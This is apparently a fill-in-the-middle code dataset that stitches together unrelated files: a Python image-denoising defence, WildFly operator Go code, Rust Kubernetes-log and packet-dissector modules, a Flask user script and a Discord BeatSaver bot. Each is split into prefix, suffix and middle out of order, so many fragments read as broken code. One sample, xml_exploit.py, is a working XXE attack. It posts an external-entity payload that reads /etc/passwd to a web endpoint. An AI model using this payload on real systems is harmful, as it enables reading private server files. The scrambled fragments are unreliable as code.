res += lamb * np.linalg.norm(z_init[1:, :] - z_init[:-1, :], norm, axis=1).sum()
res += lamb * np.linalg.norm(z_init[:, 1:] - z_init[:, :-1], norm, axis=0).sum()
return res
@staticmethod
def _deri_loss_func(z_init: np.ndarray, x: np.ndarray, mask: np.ndarray, norm: int, lamb: float) -> float:
"""
Derivative of loss function to be minimized.
:param z_init: Initial guess.
:param x: Original image.
:param mask: A matrix that decides which points are kept.
:param norm: The norm (positive integer).
:param lamb: The lambda parameter in the objective function.
:return: Derivative value.
"""
# First compute the derivative of the first component of the loss function
nor1 = np.sqrt(np.power(z_init - x.flatten(), 2).dot(mask.flatten()))
if nor1 < 1e-6:
nor1 = 1e-6
der1 = ((z_init - x.flatten()) * mask.flatten()) / (nor1 * 1.0)
# Then compute the derivative of the second component of the loss function
z_init = np.reshape(z_init, x.shape)
if norm == 1:
z_d1 = np.sign(z_init[1:, :] - z_init[:-1, :])
z_d2 = np.sign(z_init[:, 1:] - z_init[:, :-1])
else:
z_d1_norm = np.power(np.linalg.norm(z_init[1:, :] - z_init[:-1, :], norm, axis=1), norm - 1)
z_d2_norm = np.power(np.linalg.norm(z_init[:, 1:] - z_init[:, :-1], norm, axis=0), norm - 1)
z_d1_norm[z_d1_norm < 1e-6] = 1e-6
z_d2_norm[z_d2_norm < 1e-6] = 1e-6
z_d1_norm = np.repeat(z_d1_norm[:, np.newaxis], z_init.shape[1], axis=1)
z_d2_norm = np.repeat(z_d2_norm[np.newaxis, :], z_init.shape[0], axis=0)
z_d1 = norm * np.power(z_init[1:, :] - z_init[:-1, :], norm - 1) / z_d1_norm
z_d2 = norm * np.power(z_init[:, 1:] - z_init[:, :-1], norm - 1) / z_d2_norm
der2 = np.zeros(z_init.shape)
der2[:-1, :] -= z_d1
der2[1:, :] += z_d1
der2[:, :-1] -= z_d2
der2[:, 1:] += z_d2
der2 = lamb * der2.flatten()
# Total derivative
return der1 + der2
def _check_params(self) -> None:
if not isinstance(self.prob, (float, int)) or self.prob < 0.0 or self.prob > 1.0:
logger.error("Probability must be between 0 and 1.")
raise ValueError("Probability must be between 0 and 1.")
if not isinstance(self.norm, (int, np.int)) or self.norm <= 0:
logger.error("Norm must be a positive integer.")
raise ValueError("Norm must be a positive integer.")
if not (self.solver == "L-BFGS-B" or self.solver == "CG" or self.solver == "Newton-CG"):
logger.error("Current support only L-BFGS-B, CG, Newton-CG.")
raise ValueError("Current support only L-BFGS-B, CG, Newton-CG.")
if not isinstance(self.max_iter, (int, np.int)) or self.max_iter <= 0:
logger.error("Number of iterations must be a positive integer.")
raise ValueError("Number of iterations must be a positive integer.")
if self.clip_values is not None:
if len(self.clip_values) != 2:
raise ValueError("`clip_values` should be a tuple of 2 floats containing the allowed data range.")
if np.array(self.clip_values[0] >= self.clip_values[1]).any():
raise ValueError("Invalid `clip_values`: min >= max.")
if not isinstance(self.verbose, bool):
raise ValueError("The argument `verbose` has to be of type bool.")
| """
Create an instance of total variance minimization.
:param prob: Probability of the Bernoulli distribution.
:param norm: The norm (positive integer).
:param lamb: The lambda parameter in the objective function.
:param solver: Current support: `L-BFGS-B`, `CG`, `Newton-CG`.
:param max_iter: Maximum number of iterations when performing optimization.
:param clip_values: Tuple of the form `(min, max)` representing the minimum and maximum values allowed
for features.
:param apply_fit: True if applied during fitting/training.
:param apply_predict: True if applied during predicting.
:param verbose: Show progress bars.
"""
super().__init__(is_fitted=True, apply_fit=apply_fit, apply_predict=apply_predict)
self.prob = prob
self.norm = norm
self.lamb = lamb
self.solver = solver
self.max_iter = max_iter
self.clip_values = clip_values
self.verbose = verbose
self._check_params() |
service.go | package services
import (
wildflyv1alpha1 "github.com/wildfly/wildfly-operator/pkg/apis/wildfly/v1alpha1"
"github.com/wildfly/wildfly-operator/pkg/resources"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/types"
"sigs.k8s.io/controller-runtime/pkg/client"
logf "sigs.k8s.io/controller-runtime/pkg/log"
)
var log = logf.Log.WithName("wildflyserver_services")
// CreateOrUpdateAdminService create a admin service or returns one up to date with the WildflyServer
func CreateOrUpdateAdminService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme, labels map[string]string) (*corev1.Service, error) {
return createOrUpdateService(w, client, scheme, labels, AdminServiceName(w), newAdminService)
}
// CreateOrUpdateHeadlessService create a headless service or returns one up to date with the WildflyServer
func CreateOrUpdateHeadlessService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme,
labels map[string]string) (*corev1.Service, error) {
return createOrUpdateService(w, client, scheme, labels, HeadlessServiceName(w), newHeadlessService)
}
// CreateOrUpdateClusterService create a clusterIP service or returns one up to date with the WildflyServer
func CreateOrUpdateClusterService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme, labels map[string]string) (*corev1.Service, error) {
return createOrUpdateService(w, client, scheme, labels, ClusterServiceName(w), newClusterService)
}
// createOrUpdateAdminService create a service or returns one up to date with the WildflyServer.
// The serviceCreator function is responsible for the actual creation of the corev1.Service object
func createOrUpdateService(w *wildflyv1alpha1.WildFlyServer, client client.Client, scheme *runtime.Scheme,
labels map[string]string,
serviceName string,
serviceCreator func(*wildflyv1alpha1.WildFlyServer, map[string]string) *corev1.Service) (*corev1.Service, error) {
labels[resources.MarkerOperatedByHeadless] = resources.MarkerServiceActive // managing only active pods which are permitted to run EJB remote calls
service := &corev1.Service{}
err := resources.Get(w, types.NamespacedName{Name: serviceName, Namespace: w.Namespace}, client, service)
if err != nil && !errors.IsNotFound(err) {
return nil, err
}
// create the service if it is not found
if errors.IsNotFound(err) {
if err := resources.Create(w, client, scheme, serviceCreator(w, labels)); err != nil {
if errors.IsAlreadyExists(err) {
return nil, nil
}
return nil, err
}
return nil, nil
}
// service is found, update it if it does not match the wildflyServer generation
if !resources.IsCurrentGeneration(w, service) {
newService := serviceCreator(w, labels)
// copy the ClusterIP that was set after the route is created.
newService.Spec.ClusterIP = service.Spec.ClusterIP
service.Labels = labels
service.Spec = newService.Spec
if err := resources.Update(w, client, service); err != nil {
if errors.IsInvalid(err) {
// Can not update, so we delete to recreate the service from scratch
if err := resources.Delete(w, client, service); err != nil {
return nil, err
}
return nil, nil
}
return nil, err
}
return nil, nil
}
return service, nil
}
func newHeadlessService(w *wildflyv1alpha1.WildFlyServer, labels map[string]string) *corev1.Service {
labels[resources.MarkerOperatedByHeadless] = resources.MarkerServiceActive // managing only active pods which are permitted to run EJB remote calls
headlessService := &corev1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: HeadlessServiceName(w),
Namespace: w.Namespace,
Labels: labels,
},
Spec: corev1.ServiceSpec{
Type: corev1.ServiceTypeClusterIP,
Selector: labels,
ClusterIP: corev1.ClusterIPNone,
Ports: []corev1.ServicePort{
{
Name: "http",
Port: resources.HTTPApplicationPort,
},
},
},
}
return headlessService
}
// newAdminService returns a service exposing the management port of WildFly
func | (w *wildflyv1alpha1.WildFlyServer, labels map[string]string) *corev1.Service {
headlessService := &corev1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: AdminServiceName(w),
Namespace: w.Namespace,
Labels: labels,
},
Spec: corev1.ServiceSpec{
Type: corev1.ServiceTypeClusterIP,
Selector: labels,
ClusterIP: corev1.ClusterIPNone,
Ports: []corev1.ServicePort{
{
Name: "admin",
Port: resources.HTTPManagementPort,
},
},
},
}
return headlessService
}
// newClusterService returns a ClusterIP service
func newClusterService(w *wildflyv1alpha1.WildFlyServer, labels map[string]string) *corev1.Service {
labels[resources.MarkerOperatedByLoadbalancer] = resources.MarkerServiceActive // managing only active pods which are not in scaledown process
sessionAffinity := corev1.ServiceAffinityNone
if w.Spec.SessionAffinity {
sessionAffinity = corev1.ServiceAffinityClientIP
}
loadBalancer := &corev1.Service{
ObjectMeta: metav1.ObjectMeta{
Name: ClusterServiceName(w),
Namespace: w.Namespace,
Labels: labels,
},
Spec: corev1.ServiceSpec{
Type: corev1.ServiceTypeClusterIP,
Selector: labels,
SessionAffinity: sessionAffinity,
Ports: []corev1.ServicePort{
{
Name: "http",
Port: resources.HTTPApplicationPort,
},
},
},
}
return loadBalancer
}
// HeadlessServiceName returns the name of the headless service
func HeadlessServiceName(w *wildflyv1alpha1.WildFlyServer) string {
return w.Name + "-headless"
}
// AdminServiceName returns the name of the admin service
func AdminServiceName(w *wildflyv1alpha1.WildFlyServer) string {
return w.Name + "-admin"
}
// ClusterServiceName returns the name of the cluster service.
//
// The service remains named with the -loadbalancer suffix for backwards compatibility
/// even if it is now a ClusterIP service.
func ClusterServiceName(w *wildflyv1alpha1.WildFlyServer) string {
return w.Name + "-loadbalancer"
}
| newAdminService |
logs.rs | // Copyright 2021 Databricks, Inc.
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use ansi_term::Colour::Yellow;
use chrono::offset::{Local, Utc};
use chrono::DateTime;
use clap::{App, Arg};
use k8s_openapi::api::core::v1 as api;
use reqwest::blocking::Response;
use rustyline::completion::Pair as RustlinePair;
use strfmt::strfmt;
use crate::{
command::command_def::{exec_match, start_clap, Cmd},
command::{parse_duration, valid_date, valid_duration, valid_u32},
completer,
env::Env,
error::ClickError,
kobj::{KObj, ObjType},
output::ClickWriter,
};
use std::cell::RefCell;
use std::collections::HashMap;
use std::convert::TryFrom;
use std::io::{BufRead, BufReader, Read, Write};
use std::path::PathBuf;
use std::sync::atomic::Ordering;
use std::sync::mpsc::{channel, RecvTimeoutError};
use std::thread;
use std::time::Duration;
// logs helper commands
fn pick_container<'a>(obj: &'a KObj, writer: &mut ClickWriter) -> &'a str {
match obj.typ {
ObjType::Pod { ref containers, .. } => {
if containers.len() > 1 {
clickwriteln!(writer, "Pod has multiple containers, picking the first one");
}
containers[0].as_str()
}
_ => unreachable!(),
}
}
#[allow(clippy::ptr_arg)]
fn write_logs_to_file(
env: &Env,
path: &PathBuf,
mut reader: BufReader<Response>,
) -> Result<(), ClickError> {
let mut file = std::fs::File::create(path)?;
let mut buffer = [0; 1024];
while !env.ctrlcbool.load(Ordering::SeqCst) {
let amt = reader.read(&mut buffer[..])?;
if amt == 0 {
break;
}
file.write_all(&buffer[0..amt])?;
}
file.flush().map_err(ClickError::from)
}
#[allow(clippy::too_many_arguments)]
fn | <'a>(
obj: &'a KObj,
env: &Env,
mut opts: api::ReadNamespacedPodLogOptional<'a>,
cont_opt: Option<&'a str>,
output_opt: Option<&str>,
editor: bool,
editor_opt: Option<&str>,
timeout: Option<Duration>,
writer: &mut ClickWriter,
) -> Result<(), ClickError> {
let cont = cont_opt.unwrap_or_else(|| pick_container(obj, writer));
opts.container = Some(cont);
let (request, _resp) =
api::Pod::read_namespaced_pod_log(obj.name(), obj.namespace.as_ref().unwrap(), opts)?;
let logs_reader_res = env.run_on_context(|c| c.execute_reader(request, timeout));
match logs_reader_res {
Ok(lreader) => {
let mut reader = BufReader::new(lreader);
env.ctrlcbool.store(false, Ordering::SeqCst);
if let Some(output) = output_opt {
let mut fmtvars = HashMap::new();
fmtvars.insert("name".to_string(), obj.name());
fmtvars.insert(
"namespace".to_string(),
obj.namespace.as_deref().unwrap_or("[none]"),
);
let ltime = Local::now().to_rfc3339();
fmtvars.insert("time".to_string(), <ime);
match strfmt(output, &fmtvars) {
Ok(file_path) => {
let pbuf = file_path.into();
write_logs_to_file(env, &pbuf, reader)?;
println!("Wrote logs to {}", pbuf.to_str().unwrap());
Ok(())
}
Err(e) => Err(ClickError::CommandError(format!(
"Can't generate output path: {}",
e
))),
}
} else if editor {
// We're opening in an editor, save to a temp
let editor = if let Some(v) = editor_opt {
v.to_owned()
} else if let Some(ref e) = env.click_config.editor {
e.clone()
} else {
match std::env::var("EDITOR") {
Ok(ed) => ed,
Err(e) => {
return Err(ClickError::CommandError(format!(
"Could not get EDITOR environment variable: {}",
e
)));
}
}
};
let tmpdir = match env.tempdir {
Ok(ref td) => td,
Err(ref e) => {
return Err(ClickError::CommandError(format!(
"Failed to create tempdir: {}",
e
)));
}
};
let file_path = tmpdir.path().join(format!(
"{}_{}_{}.log",
obj.name(),
cont,
Local::now().to_rfc3339()
));
write_logs_to_file(env, &file_path, reader)?;
clickwriteln!(writer, "Logs downloaded, starting editor");
let expr = if editor.contains(' ') {
// split the whitespace
let mut eargs: Vec<&str> = editor.split_whitespace().collect();
eargs.push(file_path.to_str().unwrap());
duct::cmd(eargs[0], &eargs[1..])
} else {
cmd!(editor, file_path)
};
expr.start()?;
Ok(())
} else {
let (sender, receiver) = channel();
thread::spawn(move || {
loop {
let mut line = String::new();
if let Ok(amt) = reader.read_line(&mut line) {
if amt > 0 {
if sender.send(line).is_err() {
// probably user hit ctrl-c, just stop
break;
}
} else {
break;
}
} else {
break;
}
}
});
while !env.ctrlcbool.load(Ordering::SeqCst) {
match receiver.recv_timeout(Duration::new(1, 0)) {
Ok(line) => {
clickwrite!(writer, "{}", line); // newlines already in line
}
Err(e) => {
if let RecvTimeoutError::Disconnected = e {
break;
}
}
}
}
Ok(())
}
}
Err(e) => Err(e),
}
}
command!(
Logs,
"logs",
"Get logs from a container in the current pod",
|clap: App<'static, 'static>| {
let ret = clap
.arg(
Arg::with_name("container")
.help("Specify which container to get logs from")
.required(false)
.index(1),
)
.arg(
Arg::with_name("follow")
.short("f")
.long("follow")
.help("Follow the logs as new records arrive (stop with ^C)")
.conflicts_with("editor")
.conflicts_with("output")
.takes_value(false),
)
.arg(
Arg::with_name("tail")
.short("t")
.long("tail")
.validator(valid_u32)
.help("Number of lines from the end of the logs to show")
.takes_value(true),
)
.arg(
Arg::with_name("previous")
.short("p")
.long("previous")
.help("Return previous terminated container logs")
.takes_value(false),
)
.arg(
Arg::with_name("since")
.long("since")
.conflicts_with("sinceTime")
.validator(valid_duration)
.help(
"Only return logs newer than specified relative duration,
e.g. 5s, 2m, 3m5s, 1h2min5sec",
)
.takes_value(true),
)
.arg(
Arg::with_name("sinceTime")
.long("since-time")
.conflicts_with("since")
.validator(valid_date)
.help(
"Only return logs newer than specified RFC3339 date. Eg:
1996-12-19T16:39:57-08:00",
)
.takes_value(true),
)
.arg(
Arg::with_name("timestamps")
.long("timestamps")
.help(
"Include an RFC3339 or RFC3339Nano timestamp at the beginning \
of every line of log output.",
)
.takes_value(false),
)
.arg(
Arg::with_name("editor")
.long("editor")
.short("e")
.conflicts_with("follow")
.conflicts_with("output")
.help(
"Open fetched logs in an editor rather than printing them out. with \
--editor ARG, ARG is used as the editor command, otherwise click \
environment editor (see set/env commands) is used, otherwise the \
$EDITOR environment variable is used.",
)
.takes_value(true)
.min_values(0),
)
.arg(
Arg::with_name("output")
.long("output")
.short("o")
.conflicts_with("editor")
.conflicts_with("follow")
.help(
"Write output to a file at the specified path instead of printing it. \
This path can be templated with {name}, {namespace}, and {time} to write \
individual files for each pod in a range. (See 'help ranges').",
)
.takes_value(true),
);
k8s_if_ge_1_17! {
let ret = ret.arg(
Arg::with_name("insecure")
.long("insecure-skip-tls-verify-backend")
.help("Skip verifying the identity of the kubelet that logs are requested from. \
This could allow an attacker to provide invalid logs. \
Useful if your kubelet serving certs have expired or similar.")
.takes_value(false)
)
}
ret
},
vec!["logs"],
vec![&completer::container_completer],
no_named_complete!(),
#[allow(clippy::cognitive_complexity)]
|matches, env, writer| {
let mut opts: api::ReadNamespacedPodLogOptional = Default::default();
if matches.is_present("follow") {
opts.follow = Some(true);
}
k8s_if_ge_1_17! {
if matches.is_present("insecure") {
opts.insecure_skip_tls_verify_backend = Some(true);
}
}
if matches.is_present("previous") {
opts.previous = Some(true);
}
if matches.is_present("tail") {
let lines = matches.value_of("tail").unwrap().parse::<i64>().unwrap();
opts.tail_lines = Some(lines);
}
if matches.is_present("since") {
// all unwraps already validated
let dur = parse_duration(matches.value_of("since").unwrap()).unwrap();
let dur = match i64::try_from(dur.as_secs()) {
Ok(d) => d,
Err(e) => {
clickwriteln!(writer, "Invalid duration in --since: {}", e);
return Ok(()); // TODO: Return error
}
};
opts.since_seconds = Some(dur);
}
if matches.is_present("sinceTime") {
let specified =
DateTime::parse_from_rfc3339(matches.value_of("sinceTime").unwrap()).unwrap();
let dur = Utc::now().signed_duration_since(specified.with_timezone(&Utc));
opts.since_seconds = Some(dur.num_seconds());
}
let timeout = if matches.is_present("follow") {
None
} else {
Some(Duration::new(20, 0)) // TODO what's a reasonable timeout here?
};
if matches.is_present("timestamps") {
opts.timestamps = Some(true);
}
env.apply_to_selection(
writer,
Some(&env.click_config.range_separator),
|obj, writer| {
if obj.is_pod() {
do_logs(
obj,
env,
opts,
matches.value_of("container"),
matches.value_of("output"),
matches.is_present("editor"),
matches.value_of("editor"),
timeout,
writer,
)
} else {
Err(ClickError::CommandError(
"Logs only available on a pod".to_string(),
))
}
},
)
}
);
| do_logs |
dissection.rs | use super::{AnyPdu, Pdu, RawPdu, Session, TempPdu};
use sniffle_ende::decode::Decode;
use sniffle_ende::nom::{self, combinator::map, Parser};
use std::marker::PhantomData;
#[derive(Debug, Clone, Copy)]
pub struct Priority(pub i32);
pub use sniffle_ende::decode::DResult;
pub use sniffle_ende::decode::DecodeError as DissectError;
pub trait Dissect: Pdu {
fn dissect<'a>(
buf: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self>;
fn | <'a>(session: &'a Session, parent: Option<TempPdu<'a>>) -> DissectParser<'a, Self> {
DissectParser {
session,
parent,
_marker: PhantomData,
}
}
}
pub struct DissectParser<'a, D: Dissect> {
session: &'a Session,
parent: Option<TempPdu<'a>>,
_marker: PhantomData<fn(D) -> D>,
}
pub trait Dissector {
type Out: Pdu;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out>;
}
pub struct AnyDissector(Box<dyn Dissector<Out = AnyPdu> + Send + Sync + 'static>);
pub struct DissectorTableParser<'a, T: DissectorTable> {
table: Option<&'a T>,
param: &'a T::Param,
session: &'a Session,
parent: Option<TempPdu<'a>>,
}
pub trait DissectorTable: Default {
type Param;
fn load<D: Dissector + Send + Sync + 'static>(
&mut self,
param: Self::Param,
priority: Priority,
dissector: D,
);
fn find(&self, param: &Self::Param) -> Option<&[AnyDissector]>;
fn dissector<'a>(
&'a self,
param: &'a Self::Param,
session: &'a Session,
parent: Option<TempPdu<'a>>,
) -> DissectorTableParser<'a, Self> {
DissectorTableParser {
table: Some(self),
param,
session,
parent,
}
}
fn dissect<'a>(
&self,
param: &Self::Param,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, AnyPdu> {
self.dissector(param, session, parent).parse(buffer)
}
fn dissect_or_raw<'a>(
&self,
param: &Self::Param,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, AnyPdu> {
self.dissector(param, session, parent)
.or(map(RawPdu::decode, AnyPdu::new))
.parse(buffer)
}
}
impl<'a, 'b, D: Dissect> Parser<&'a [u8], D, DissectError<'a>> for DissectParser<'b, D> {
fn parse(&mut self, input: &'a [u8]) -> DResult<'a, D> {
D::dissect(input, self.session, self.parent.clone())
}
}
impl<'a, 'b, T: DissectorTable> Parser<&'a [u8], AnyPdu, DissectError<'a>>
for DissectorTableParser<'b, T>
{
fn parse(&mut self, input: &'a [u8]) -> DResult<'a, AnyPdu> {
if let Some(table) = self.table {
for dissector in table.find(self.param).unwrap_or(&[]) {
match Dissector::dissect(dissector, input, self.session, self.parent.clone()) {
Ok((buf, pdu)) => {
return Ok((buf, pdu));
}
Err(nom::Err::Failure(e)) => {
return Err(nom::Err::Failure(e));
}
_ => {}
}
}
}
Err(nom::Err::Error(DissectError::Malformed))
}
}
impl<'a, T: DissectorTable> DissectorTableParser<'a, T> {
pub fn null_parser(
param: &'a T::Param,
session: &'a Session,
parent: Option<TempPdu<'a>>,
) -> Self {
Self {
table: None,
param,
session,
parent,
}
}
}
impl Dissector for AnyDissector {
type Out = AnyPdu;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out> {
self.0.dissect(buffer, session, parent)
}
}
impl<F, P> Dissector for F
where
P: Pdu,
F: for<'a> Fn(&'a [u8], &Session, Option<TempPdu<'_>>) -> DResult<'a, P>,
{
type Out = P;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out> {
self(buffer, session, parent)
}
}
struct DissectorAdapter<D: Dissector>(D);
impl<D: Dissector> Dissector for DissectorAdapter<D> {
type Out = AnyPdu;
fn dissect<'a>(
&self,
buffer: &'a [u8],
session: &Session,
parent: Option<TempPdu<'_>>,
) -> DResult<'a, Self::Out> {
self.0
.dissect(buffer, session, parent)
.map(|(rem, pdu)| (rem, AnyPdu::new(pdu)))
}
}
impl AnyDissector {
pub fn new<D: Dissector + Send + Sync + 'static>(dissector: D) -> Self {
Self(Box::new(DissectorAdapter(dissector)))
}
}
#[macro_export]
macro_rules! dissector_table {
($name:ident) => {
dissector_table!(__priv_decl, $name, ());
dissector_table!(__impl, $name, ());
};
(pub $name:ident) => {
dissector_table!(__pub_decl, $name, ());
dissector_table!(__impl, $name, ());
};
($name:ident, $param:ty) => {
dissector_table!(__priv_decl, $name, $param);
dissector_table!(__impl, $name, $param);
};
(pub $name:ident, $param:ty) => {
dissector_table!(__pub_decl, $name, $param);
dissector_table!(__impl, $name, $param);
};
(__priv_decl, $name:ident, ()) => {
struct $name(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
);
};
(__pub_decl, $name:ident, ()) => {
pub struct $name(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
);
};
(__priv_decl, $name:ident, $param:ty) => {
struct $name(
::std::collections::HashMap<
$param,
(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
),
>,
);
};
(__pub_decl, $name:ident, $param:ty) => {
pub struct $name(
::std::collections::HashMap<
$param,
(
::std::vec::Vec<$crate::Priority>,
::std::vec::Vec<$crate::AnyDissector>,
),
>,
);
};
(__impl, $name:ident, ()) => {
impl $name {
pub fn new() -> Self {
Self(::std::vec::Vec::new(), ::std::vec::Vec::new())
}
}
impl ::std::default::Default for $name {
fn default() -> Self {
Self::new()
}
}
impl $crate::DissectorTable for $name {
type Param = ();
fn load<D: $crate::Dissector + Send + Sync + 'static>(
&mut self,
_param: Self::Param,
priority: $crate::Priority,
dissector: D,
) {
let dissector = $crate::AnyDissector::new(dissector);
let pos = self
.0
.binary_search_by(|item| priority.0.cmp(&item.0))
.unwrap_or_else(|e| e);
self.0.insert(pos, priority);
self.1.insert(pos, dissector);
}
fn find(&self, _param: &Self::Param) -> Option<&[$crate::AnyDissector]> {
Some(&self.1[..])
}
}
};
(__impl, $name:ident, $param:ty) => {
impl $name {
pub fn new() -> Self {
Self(::std::collections::HashMap::new())
}
}
impl ::std::default::Default for $name {
fn default() -> Self {
Self::new()
}
}
impl $crate::DissectorTable for $name {
type Param = $param;
fn load<D: $crate::Dissector + Send + Sync + 'static>(
&mut self,
param: Self::Param,
priority: $crate::Priority,
dissector: D,
) {
let dissector = $crate::AnyDissector::new(dissector);
let table = self
.0
.entry(param)
.or_insert((::std::vec::Vec::new(), ::std::vec::Vec::new()));
let pos = table
.0
.binary_search_by(|item| priority.0.cmp(&item.0))
.unwrap_or_else(|e| e);
table.0.insert(pos, priority);
table.1.insert(pos, dissector);
}
fn find(&self, param: &Self::Param) -> Option<&[$crate::AnyDissector]> {
match self.0.get(param) {
Some(table) => Some(&table.1[..]),
None => None,
}
}
}
};
}
| dissector |
create_user.py | import sys,os
sys.path.append(os.path.dirname(os.getcwd()))
from app.models import User | u = User(username=sys.argv[1])
u.set_password(sys.argv[2])
db.session.add(u)
db.session.commit() | from app import db |
xml_exploit.py | import requests
| <!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text) | url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY> |
BeatSaver.ts | import { Message, MessageEmbed } from "discord.js";
import HexToDecimal from "../../Utils/HexToDecimal";
import ErrorEmbed from "../../Utils/Embeds/ErrorEmbed";
import BaseCommand from "../BaseCommand";
import CommandManager from "../CommandManager";
import BSApi from "beatsaver-api";
import * as types from "beatsaver-api/lib/types/BeatSaverSong";
import BeatSaverClient from "../../api/BeatSaver/BeatSaverClient";
import { BeatSaverMap, DiffsEntity, VersionsEntity } from "../../api/BeatSaver/Types";
const bs = BeatSaverClient;
const diffEmotes = {
Easy: "``Easy``",
Normal: "``Normal``",
Hard: "``Hard``",
Expert: "``Expert``",
ExpertPlus: "``Expert+``",
};
type diffIndexType = "Easy" | "Normal" | "Hard" | "Expert" | "ExpertPlus";
// Added by Sirspam with a little help from Aso
class BeatSaver extends BaseCommand {
async execute(msg: Message, args: string[]) {
try {
var Map = await bs.getMapFromId(args[0]);
} catch {
return ErrorEmbed("Map not found", "You should try e970 though");
}
// Store latest version so we don't have to get it every time
let LatestVersion = Map.versions[Map.versions.length - 1];
// Store the metadata so we don't have to reference it by Map.metadata everytime
// Also get the difficulty info and store date
let Meta = Map.metadata;
let difficulties = Difficulties(LatestVersion);
var date = new Date(Map.uploaded);
// Store the minutes and seconds in a variable so we can format them later
var minutes = Math.floor(Meta.duration / 60);
let seconds = Meta.duration - minutes * 60;
// Create the stats for the selected difficulty in the second argument
let stats = DifficultyStats(args[1] as diffIndexType, LatestVersion);
// Store Mod "Requirements" Array
let Requires = ModRequirements(stats);
// Create the embed
var embed = new MessageEmbed({
title: Meta.songSubName == "" ? Meta.songName : `${Meta.songName} - ${Meta.songSubName}`,
url: `https://beatsaver.com/beatmap/${args[0]}`,
description: `**${Meta.songAuthorName}**`,
image: {
url: LatestVersion.coverURL,
},
color: Color(Map),
fields: [
{
name: "Map Stats",
value: `⏱ Duration: ${minutes}:${seconds.toString().length != 1 ? seconds : `0${seconds}`}\n🥁 BPM: ${Meta.bpm}\n✏️ Mapper: ${Meta.levelAuthorName}\n⚔️ ${
Map.ranked ? "**Ranked**" : Map.qualified ? "**Qualified**" : "**Unranked**"
}`,
inline: true,
},
{
name: "BeatSaver Stats",
value: `🔑: ${Map.id}\n💾: ${Map.stats.downloads}\n👍: ${Map.stats.upvotes - Map.stats.downvotes}\n📅: ${date.getFullYear()}/${(date.getMonth() + 1)
.toString()
.padStart(2, "0")}/${date.getDate().toString().padStart(2, "0")}`,
inline: true,
},
{ name: "Difficulties", value: difficulties.string, inline: true },
{
name: `Difficulty Stats ${diffEmotes[stats.difficulty]}`,
value: `NPS: ${stats.nps}\nNJS: ${stats.njs}\nNotes: ${stats.notes}\n${
Requires.length != 0 ? `<:BK_ModRequired:872808303506391090> ${Requires.join(", ")}` : ""
}`,
inline: true,
},
{
name: "Links",
value: `[Preview Map](https://skystudioapps.com/bs-viewer/?id=${LatestVersion.key})\n[Download Map](${LatestVersion.downloadURL})`,
inline: true,
},
],
});
return embed;
}
label = "beatsaver";
aliases = ["bs", "bsr"];
description = "Returns information on a BeatSaver map";
Module = "Info";
}
// I hate this function so much, i never want to look at it again - Aso 26/07/21
// I had to look at it again - Aso 05/08/21
// Generates difficulty string and gets top difficulty
function Difficulties(LatestVersio | ntity) {
let Difficulties: diffIndexType[] = [];
let emoteString = "";
LatestVersion.diffs
.map((d) => d.difficulty)
.forEach((diff) => {
if (Difficulties.includes(diff)) return;
Difficulties.push(diff);
emoteString = emoteString.concat(`\n${diffEmotes[diff]}`);
});
return {
string: emoteString,
topDiff: Difficulties[Difficulties.length - 1],
};
}
// Generate difficulty stats, i.e NPS, NJS
// Also checks if `diff` is an actual difficulty, which also accounts for if the user doesn't provide a difficulty
function DifficultyStats(diff: diffIndexType, LatestVersion: VersionsEntity) {
let char = LatestVersion.diffs.find((d) => d.difficulty.toLowerCase() == diff);
if (!char) {
char = LatestVersion.diffs[LatestVersion.diffs.length - 1];
}
return char;
}
function ModRequirements(Diff: DiffsEntity) {
let Requires: string[] = [];
if (Diff.me) Requires.push("Mapping Extensions");
if (Diff.ne) Requires.push("Noodle Extensions");
if (Diff.chroma) Requires.push("Chroma");
if (Diff.cinema) Requires.push("Cinema");
return Requires;
}
function Color(Map: BeatSaverMap) {
if (Map.ranked) {
return "59ff85";
} else if (Map.qualified) {
return "ffcb59";
} else {
return "33A7FF";
}
}
CommandManager.registerCommand(new BeatSaver());
export default {
bs,
};
| n: VersionsE |
parse.rs | use std::{path::PathBuf, sync::Arc};
use bigdecimal::BigDecimal;
use indexmap::IndexMap;
use log::trace;
use nu_errors::{ArgumentError, ParseError};
use nu_path::expand_path;
use nu_protocol::hir::{
self, Binary, Block, Call, ClassifiedCommand, Expression, ExternalRedirection, Flag, FlagKind,
Group, InternalCommand, Member, NamedArguments, Operator, Pipeline, RangeOperator,
SpannedExpression, Synthetic, Unit,
};
use nu_protocol::{NamedType, PositionalType, Signature, SyntaxShape, UnspannedPathMember};
use nu_source::{HasSpan, Span, Spanned, SpannedItem};
use num_bigint::BigInt;
use crate::parse::source::parse_source_internal;
